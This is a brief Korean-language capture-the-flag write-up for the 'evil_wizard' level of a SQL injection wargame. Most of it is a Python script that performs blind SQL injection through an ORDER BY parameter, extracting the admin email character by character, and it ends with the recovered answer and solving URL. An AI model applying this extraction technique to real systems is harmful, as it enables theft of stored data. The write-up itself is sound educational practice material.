evil_wizard

첫 화면이다.

Blind SQL Injection으로 풀었다.

파이썬 코드를 짜면 아래와 같다.

import requests

URL = 'https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'score</th><tr><td>rubiya'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 30
def find_email_length():
    email_len = 1
    while query("if(id='admin' and length(email)={}, id='admin', id='rubiya')".format(email_len)) is False:
        email_len += 1
    print('email_len: {}'.format(email_len))
    return email_len


# aasup3r_secure_email@emai1.com
def find_email():
    email_len = find_email_length()
    email = ''
    for pos in range(1, email_len + 1):
        for character in range(0, 128):
            if query("if(id='admin' and ord(substr(email,{},1))={}, id='admin', id='rubiya')".format(pos, character)) is True:
                email += chr(character)
                break
    print('email: {}'.format(email))


find_email()

실행결과, email은 aasup3r_secure_email@emai1.com 이다.

https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?email=aasup3r_secure_email@emai1.com 에 접속하면 문제가 풀린다.